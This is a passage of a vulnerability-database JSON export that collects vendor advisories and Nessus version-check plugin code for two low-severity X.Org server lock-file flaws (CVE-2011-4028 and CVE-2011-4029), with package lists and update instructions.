events did not contain relative axis values. As\na consequence, clients which relied on relative values for functioning did\nnot behave as expected. This update sets the values to the original driver\nvalues instead of the already transformed values. Now, raw events contain\nrelative axis values as expected. (BZ#805377)\n\nAll users of xorg-x11-server are advised to upgrade to these updated\npackages, which correct these issues. All running X.Org server instances\nmust be restarted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-July/030760.html\n\n**Affected packages:**\nxorg-x11-server\nxorg-x11-server-Xdmx\nxorg-x11-server-Xephyr\nxorg-x11-server-Xnest\nxorg-x11-server-Xorg\nxorg-x11-server-Xvfb\nxorg-x11-server-common\nxorg-x11-server-devel\nxorg-x11-server-source\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0939.html", "edition": 3, "modified": "2012-07-10T17:26:54", "published": "2012-07-10T17:26:54", "href": "http://lists.centos.org/pipermail/centos-announce/2012-July/030760.html", "id": "CESA-2012:0939", "title": "xorg security update", "type": "centos", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}], "suse": [{"lastseen": "2016-09-04T12:23:22", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "The X server had two security issues and one bug that is\n fixed by this update.\n\n CVE-2011-4028: It is possible for a local attacker to\n deduce if a file exists or not by exploiting the way that\n Xorg creates its lock files.\n\n CVE-2011-4029: It is possible for a non-root local user to\n set the read permission for all users on any file or\n directory.\n\n", "edition": 1, "modified": "2012-02-09T19:10:34", "published": "2012-02-09T19:10:34", "id": "OPENSUSE-SU-2012:0227-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-02/msg00008.html", "title": "xorg-x11-server (important)", "type": "suse", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-04T11:32:37", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "This update fixes two security issues with the X server:\n\n * A local attacker could find out if a file exists by\n exploiting the way that Xorg creates its lock files.\n (CVE-2011-4028\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4028\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4028</a>\n > )\n * A non-root local user could set the read permission\n for all users on any file or directory. (CVE-2011-4029\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4029\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4029</a>\n > )\n", "edition": 1, "modified": "2011-12-02T08:08:16", "published": "2011-12-02T08:08:16", "id": "SUSE-SU-2011:1292-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-12/msg00002.html", "type": "suse", "title": "Security update for xorg-x11-server (important)", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:55", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "X.Org is an open source implementation of the X Window System. It provides\nthe basic low-level functionality that full-fledged graphical user\ninterfaces are designed upon.\n\nA flaw was found in the way the X.Org server handled lock files. A local\nuser with access to the system console could use this flaw to determine the\nexistence of a file in a directory not accessible to the user, via a\nsymbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed temporary\nlock files. A local attacker could use this flaw to perform a symbolic link\nattack, allowing them to make an arbitrary file world readable, leading to\nthe disclosure of sensitive information. (CVE-2011-4029)\n\nRed Hat would like to thank the researcher with the nickname vladz for\nreporting these issues.\n\nThis update also fixes the following bugs:\n\n* Prior to this update, the KDE Display Manager (KDM) could pass invalid\n24bpp pixmap formats to the X server. As a consequence, the X server could\nunexpectedly abort. This update modifies the underlying code to pass the\ncorrect formats. (BZ#651934, BZ#722860)\n\n* Prior to this update, absolute input devices, like the stylus of a\ngraphic tablet, could become unresponsive in the right-most or bottom-most\nscreen if the X server was configured as a multi-screen setup through\nmultiple \"Device\" sections in the xorg.conf file. This update changes the\nscreen crossing behavior so that absolute devices are always mapped across\nall screens. (BZ#732467)\n\n* Prior to this update, the misleading message \"Session active, not\ninhibited, screen idle. If you see this test, your display server is broken\nand you should notify your distributor.\" could be displayed after resuming\nthe system or re-enabling the display, and included a URL to an external\nweb page. This update removes this message. (BZ#748704)\n\n* Prior to this update, the erroneous input handling code of the Xephyr\nserver disabled screens on a screen crossing event. The focus was only on\nthe screen where the mouse was located and only this screen was updated\nwhen the Xephyr nested X server was configured in a multi-screen setup.\nThis update removes this code and Xephyr now correctly updates screens in\nmulti-screen setups. (BZ#757792)\n\n* Prior to this update, raw events did not contain relative axis values. As\na consequence, clients which relied on relative values for functioning did\nnot behave as expected. This update sets the values to the original driver\nvalues instead of the already transformed values. Now, raw events contain\nrelative axis values as expected. (BZ#805377)\n\nAll users of xorg-x11-server are advised to upgrade to these updated\npackages, which correct these issues. All running X.Org server instances\nmust be restarted for this update to take effect.\n", "modified": "2018-06-06T20:24:25", "published": "2012-06-20T04:00:00", "id": "RHSA-2012:0939", "href": "https://access.redhat.com/errata/RHSA-2012:0939", "type": "redhat", "title": "(RHSA-2012:0939) Low: xorg-x11-server security and bug fix update", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-08-13T18:45:19", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028"], "description": "X.Org is an open source implementation of the X Window System. It provides\nthe basic low-level functionality that full-fledged graphical user\ninterfaces are designed upon.\n\nA flaw was found in the way the X.Org server handled lock files. A local\nuser with access to the system console could use this flaw to determine the\nexistence of a file in a directory not accessible to the user, via a\nsymbolic link attack. (CVE-2011-4028)\n\nRed Hat would like to thank the researcher with the nickname vladz for\nreporting this issue.\n\nThis update also fixes the following bugs:\n\n* In rare cases, if the front and back buffer of the miDbePositionWindow()\nfunction were not both allocated in video memory, or were both allocated in\nsystem memory, the X Window System sometimes terminated unexpectedly. A\npatch has been provided to address this issue and X no longer crashes in\nthe described scenario. (BZ#596899)\n\n* Previously, when the miSetShape() function called the miRegionDestroy()\nfunction with a NULL region, X terminated unexpectedly if the backing store\nwas enabled. Now, X no longer crashes in the described scenario.\n(BZ#676270)\n\n* On certain workstations running in 32-bit mode, the X11 mouse cursor\noccasionally became stuck near the left edge of the X11 screen. A patch has\nbeen provided to address this issue and the mouse cursor no longer becomes\nstuck in the described scenario. (BZ#529717)\n\n* On certain workstations with a dual-head graphics adapter using the r500\ndriver in Zaphod mode, the mouse pointer was confined to one monitor screen\nand could not move to the other screen. A patch has been provided to\naddress this issue and the mouse cursor works properly across both screens.\n(BZ#559964)\n\n* Due to a double free operation, Xvfb (X virtual framebuffer) terminated\nunexpectedly with a segmentation fault randomly when the last client\ndisconnected, that is when the server reset. This bug has been fixed in the\nmiDCCloseScreen() function and Xvfb no longer crashes. (BZ#674741)\n\n* Starting the Xephyr server on an AMD64 or Intel 64 architecture with an\nintegrated graphics adapter caused the server to terminate unexpectedly.\nThis bug has been fixed in the code and Xephyr no longer crashes in the\ndescribed scenario. (BZ#454409)\n\n* Previously, when a client made a request bigger than 1/4th of the limit\nadvertised in the BigRequestsEnable reply, the X server closed the\nconnection unexpectedly. With this update, the maxBigRequestSize variable\nhas been added to the code to check the size of client requests, thus\nfixing this bug. (BZ#555000)\n\n* When an X client running on a big-endian system called the\nXineramaQueryScreens() function, the X server terminated unexpectedly. This\nbug has been fixed in the xf86Xinerama module and the X server no longer\ncrashes in the described scenario. (BZ#588346)\n\n* When installing Red Hat Enterprise Linux 5 on an IBM eServer System p\nblade server, the installer did not set the correct mode on the built-in\nKVM (Keyboard-Video-Mouse). Consequently, the graphical installer took a\nvery long time to appear and then was displayed incorrectly. A patch has\nbeen provided to address this issue and the graphical installer now works\nas expected in the described scenario. Note that this fix requires the\nRed Hat Enterprise Linux 5.8 kernel update. (BZ#740497)\n\n* Lines longer than 46,340 pixels can be drawn with one of the coordinates\nbeing negative. However, for dashed lines, the miPolyBuildPoly() function\noverflowed the \"int\" type when setting up edges for a section of a dashed\nline. Consequently, dashed segments were not drawn at all. An upstream\npatch has been applied to address this issue and dashed lines are now drawn\ncorrectly. (BZ#649810)\n\nAll users of xorg-x11-server are advised to upgrade to these updated\npackages, which correct these issues. All running X.Org server instances\nmust be restarted for this update to take effect.\n", "modified": "2017-09-08T11:54:54", "published": "2012-02-21T05:00:00", "id": "RHSA-2012:0303", "href": "https://access.redhat.com/errata/RHSA-2012:0303", "type": "redhat", "title": "(RHSA-2012:0303) Low: xorg-x11-server security and bug fix update", "cvss": {"score": 1.2, "vector": "AV:L/AC:H/Au:N/C:P/I:N/A:N"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:21", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "[1.10.6-1]\n- xserver 1.10.6\n- Use git-style patch names\n- compsize.h, glxcmds.h: Copy from upstream git since they fell out of the\n upstream tarball\n[1.10.4-15]\n- Undo regression introduced in Patch8007 (#732467)\n[1.10.4-14]\n- xserver-1.10.4-sync-revert.patch: Revert an edge-case change in IDLETIME\n that appears to be more wrong than right. (#748704)\n[1.10.4-13]\n- xserver-1.10.4-randr-corner-case.patch: Fix a corner case in initial\n mode selection. (#657580)\n- xserver-1.10.4-vbe-no-cache-ddc-support.patch: Only interpret complete\n non-support for DDC extension as 'DDC unavailable'. (#657580)\n[1.10.4-11]\n- xserver-1.10.4-dix-when-rescaling-from-master-rescale-from-desktop-.patch:\n fix rescaling from master to slave if the pointer (#732467)\n[1.10.4-10]\n- Add patches to change the screen crossing behaviour for multiple\n ScreenRecs (#732467)\n- remove the xorg.conf.man page from our .gitignore - we need to patch it\n now and its part of the upstream distribution\n[1.10.4-9]\n- xserver-1.10.4-no-24bpp-xaa-composite.patch: Disable Composite at 24bpp\n in XAA (#651934)\n[1.10.4-8]\n- xserver-1.10.4-fb-picture-crash.patch: Fix crash on invalid pictures (#722680)\n[1.10.4-7]\n- fix xephyr rendering when using two screens (#757792)", "edition": 4, "modified": "2012-06-27T00:00:00", "published": "2012-06-27T00:00:00", "id": "ELSA-2012-0939", "href": "http://linux.oracle.com/errata/ELSA-2012-0939.html", "title": "xorg-x11-server security and bug fix update", "type": "oraclelinux", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:37", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2010-1166", "CVE-2011-4818"], "description": "[1.1.1-48.90.0.1.el5]\n- Added oracle-enterprise-detect.patch\n- Replaced 'Red Hat' in spec file\n[1.1.1-48.90]\n- cve-2011-4028.patch: File existence disclosure vulnerability.\n[1.1.1-48.88]\n- cve-2011-4818.patch: Multiple input sanitization flaws in Render and GLX\n- xorg-x11-server-1.1.0-mesa-copy-sub-buffer.patch: Likewise.\n[1.1.1-48.87]\n- xserver-1.1.1-fbdev-iterate-modes.patch: fix fbdev driver not iterating\n across all modes of a certain dimension (#740497)\n[1.1.1-48.86]\n- xserver-1.1.1-midc-double-free.patch: Don't double-free the picture for\n the root window when using the mi (software) cursor path. (#674741)\n[1.1.1-48.85]\n- xserver-1.1.1-bigreqs-buffer-size.patch: Fix BIG-REQUESTS buffer size\n (#555000)\n[1.1.1-48.84]\n- xserver-1.1.1-xinerama-crash.patch: Fix a crash in XineramaQueryScreens\n when client is swapped (#588346)\n[1.1.1-48.83]\n- xserver-1.1.1-xephyr-keymap.patch: Fix types in Xephyr keymap setup (#454409)\n[1.1.1-48.82]\n- xserver-1.1.1-wideline-overflow.patch: Fix integer overflow in wide line\n renderer (#649810)\n[1.1.1-48.81]\n- Fix mouse stuck on edge (#529717)\n[1.1.1-48.80]\n- xserver-1.1.1-bs-crash.patch: Fix a crash in backing store. (#676270)\n[1.1.1-48.79]\n- xserver-1.1.1-randr-fix-mouse-crossing.patch: fix zaphod mouse crossing (#559964)\n[1.1.1-48.78]\n- cve-2010-1166.patch: Fix broken modulo math in Render and arc code.\n Identical to xserver-1.1.1-mod-macro-parens.patch in 5.5.z. (#582651)\n[1.1.1-48.77]\n- xserver-1.1.1-dbe-validate-gc.patch: Validate the GC against both front\n and back buffers (#596899)", "edition": 5, "modified": "2012-03-01T00:00:00", "published": "2012-03-01T00:00:00", "id": "ELSA-2012-0303", "href": "http://linux.oracle.com/errata/ELSA-2012-0303.html", "title": "xorg-x11-server security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:56", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "\nMatthieu Herrb reports:\n\nIt is possible to deduce if a file exists or not by exploiting\n\t the way that Xorg creates its lock files. This is caused by the\n\t fact that the X server is behaving differently if the lock file\n\t already exists as a symbolic link pointing to an existing or\n\t non-existing file.\nIt is possible for a non-root user to set the permissions for\n\t all users on any file or directory to 444, giving unwanted read\n\t access or causing denies of service (by removing execute\n\t permission). This is caused by a race between creating the lock\n\t file and setting its access modes.\n\n", "edition": 4, "modified": "2011-10-18T00:00:00", "published": "2011-10-18T00:00:00", "id": "8441957C-F9B4-11E0-A78A-BCAEC565249C", "href": "https://vuxml.freebsd.org/freebsd/8441957c-f9b4-11e0-a78a-bcaec565249c.html", "title": "Xorg server -- two vulnerabilities in X server lock handling code", "type": "freebsd", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}], "amazon": [{"lastseen": "2020-11-10T12:36:20", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "**Issue Overview:**\n\nA flaw was found in the way the X.Org server handled lock files. A local user with access to the system console could use this flaw to determine the existence of a file in a directory not accessible to the user, via a symbolic link attack. ([CVE-2011-4028 __](<https://access.redhat.com/security/cve/CVE-2011-4028>))\n\nA race condition was found in the way the X.Org server managed temporary lock files. A local attacker could use this flaw to perform a symbolic link attack, allowing them to make an arbitrary file world readable, leading to the disclosure of sensitive information. ([CVE-2011-4029 __](<https://access.redhat.com/security/cve/CVE-2011-4029>))\n\n \n**Affected Packages:** \n\n\nxorg-x11-server\n\n \n**Issue Correction:** \nRun _yum update xorg-x11-server_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n xorg-x11-server-common-1.10.6-1.12.amzn1.i686 \n xorg-x11-server-Xvfb-1.10.6-1.12.amzn1.i686 \n xorg-x11-server-Xephyr-1.10.6-1.12.amzn1.i686 \n xorg-x11-server-Xnest-1.10.6-1.12.amzn1.i686 \n xorg-x11-server-debuginfo-1.10.6-1.12.amzn1.i686 \n \n noarch: \n xorg-x11-server-source-1.10.6-1.12.amzn1.noarch \n \n src: \n xorg-x11-server-1.10.6-1.12.amzn1.src \n \n x86_64: \n xorg-x11-server-debuginfo-1.10.6-1.12.amzn1.x86_64 \n xorg-x11-server-Xephyr-1.10.6-1.12.amzn1.x86_64 \n xorg-x11-server-Xnest-1.10.6-1.12.amzn1.x86_64 \n xorg-x11-server-Xvfb-1.10.6-1.12.amzn1.x86_64 \n xorg-x11-server-common-1.10.6-1.12.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2012-07-05T16:24:00", "published": "2012-07-05T16:24:00", "id": "ALAS-2012-104", "href": "https://alas.aws.amazon.com/ALAS-2012-104.html", "title": "Low: xorg-x11-server", "type": "amazon", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2021-01-17T14:01:20", "description": "The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - The LockServer function in os/utils.c in X.Org xserver\n before 1.11.2 allows local users to determine the\n existence of arbitrary files via a symlink attack on a\n temporary lock file, which is handled differently if the\n file exists. (CVE-2011-4028)\n\n - The LockServer function in os/utils.c in X.Org xserver\n before 1.11.2 allows local users to change the\n permissions of arbitrary files to 444, read those files,\n and possibly cause a denial of service (removed\n execution permission) via a symlink attack on a\n temporary lock file. (CVE-2011-4029)", "edition": 24, "published": "2015-01-19T00:00:00", "title": "Oracle Solaris Third-Party Patch Update : xorg (cve_2011_4028_information_disclosure)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "modified": "2015-01-19T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:xorg", "cpe:/o:oracle:solaris:11.0"], "id": "SOLARIS11_XORG_20120417.NASL", "href": "https://www.tenable.com/plugins/nessus/80818", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80818);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : xorg (cve_2011_4028_information_disclosure)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - The LockServer function in os/utils.c in X.Org xserver\n before 1.11.2 allows local users to determine the\n existence of arbitrary files via a symlink attack on a\n temporary lock file, which is handled differently if the\n file exists. (CVE-2011-4028)\n\n - The LockServer function in os/utils.c in X.Org xserver\n before 1.11.2 allows local users to change the\n permissions of arbitrary files to 444, read those files,\n and possibly cause a denial of service (removed\n execution permission) via a symlink attack on a\n temporary lock file. (CVE-2011-4029)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2011-4028-information-disclosure-vulnerability-in-xorg\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?37e2409e\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2011-4029-race-condition-vulnerability-in-xorg\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?71efa4a9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11/11 SRU 6.6.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:xorg\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^xorg$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.0.6.0.6.0\", sru:\"SRU 6.6\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : xorg\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_note(port:0, extra:error_extra);\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"xorg\");\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T10:46:43", "description": "Matthieu Herrb reports :\n\nIt is possible to deduce if a file exists or not by exploiting the way\nthat Xorg creates its lock files. This is caused by the fact that the\nX server is behaving differently if the lock file already exists as a\nsymbolic link pointing to an existing or non-existing file.\n\nIt is possible for a non-root user to set the permissions for all\nusers on any file or directory to 444, giving unwanted read access or\ncausing denies of service (by removing execute permission). This is\ncaused by a race between creating the lock file and setting its access\nmodes.", "edition": 24, "published": "2011-10-19T00:00:00", "title": "FreeBSD : Xorg server -- two vulnerabilities in X server lock handling code (8441957c-f9b4-11e0-a78a-bcaec565249c)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "modified": "2011-10-19T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:xorg-server"], "id": "FREEBSD_PKG_8441957CF9B411E0A78ABCAEC565249C.NASL", "href": "https://www.tenable.com/plugins/nessus/56548", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56548);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n\n script_name(english:\"FreeBSD : Xorg server -- two vulnerabilities in X server lock handling code (8441957c-f9b4-11e0-a78a-bcaec565249c)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Matthieu Herrb reports :\n\nIt is possible to deduce if a file exists or not by exploiting the way\nthat Xorg creates its lock files. This is caused by the fact that the\nX server is behaving differently if the lock file already exists as a\nsymbolic link pointing to an existing or non-existing file.\n\nIt is possible for a non-root user to set the permissions for all\nusers on any file or directory to 444, giving unwanted read access or\ncausing denies of service (by removing execute permission). This is\ncaused by a race between creating the lock file and setting its access\nmodes.\"\n );\n # https://vuxml.freebsd.org/freebsd/8441957c-f9b4-11e0-a78a-bcaec565249c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0c0099c5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:xorg-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"xorg-server<1.7.7_3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:pkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T13:10:55", "description": "Updated xorg-x11-server packages that fix two security issues and\nseveral bugs are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nX.Org is an open source implementation of the X Window System. It\nprovides the basic low-level functionality that full-fledged graphical\nuser interfaces are designed upon.\n\nA flaw was found in the way the X.Org server handled lock files. A\nlocal user with access to the system console could use this flaw to\ndetermine the existence of a file in a directory not accessible to the\nuser, via a symbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed\ntemporary lock files. A local attacker could use this flaw to perform\na symbolic link attack, allowing them to make an arbitrary file world\nreadable, leading to the disclosure of sensitive information.\n(CVE-2011-4029)\n\nRed Hat would like to thank the researcher with the nickname vladz for\nreporting these issues.\n\nThis update also fixes the following bugs :\n\n* Prior to this update, the KDE Display Manager (KDM) could pass\ninvalid 24bpp pixmap formats to the X server. As a consequence, the X\nserver could unexpectedly abort. This update modifies the underlying\ncode to pass the correct formats. (BZ#651934, BZ#722860)\n\n* Prior to this update, absolute input devices, like the stylus of a\ngraphic tablet, could become unresponsive in the right-most or\nbottom-most screen if the X server was configured as a multi-screen\nsetup through multiple 'Device' sections in the xorg.conf file. This\nupdate changes the screen crossing behavior so that absolute devices\nare always mapped across all screens. (BZ#732467)\n\n* Prior to this update, the misleading message 'Session active, not\ninhibited, screen idle. If you see this test, your display server is\nbroken and you should notify your distributor.' could be displayed\nafter resuming the system or re-enabling the display, and included a\nURL to an external web page. This update removes this message.\n(BZ#748704)\n\n* Prior to this update, the erroneous input handling code of the\nXephyr server disabled screens on a screen crossing event. The focus\nwas only on the screen where the mouse was located and only this\nscreen was updated when the Xephyr nested X server was configured in a\nmulti-screen setup. This update removes this code and Xephyr now\ncorrectly updates screens in multi-screen setups. (BZ#757792)\n\n* Prior to this update, raw events did not contain relative axis\nvalues. As a consequence, clients which relied on relative values for\nfunctioning did not behave as expected. This update sets the values to\nthe original driver values instead of the already transformed values.\nNow, raw events contain relative axis values as expected. (BZ#805377)\n\nAll users of xorg-x11-server are advised to upgrade to these updated\npackages, which correct these issues. All running X.Org server\ninstances must be restarted for this update to take effect.", "edition": 25, "published": "2012-06-20T00:00:00", "title": "RHEL 6 : xorg-x11-server (RHSA-2012:0939)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "modified": "2012-06-20T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-devel", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-source", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-common", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xephyr", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xorg", 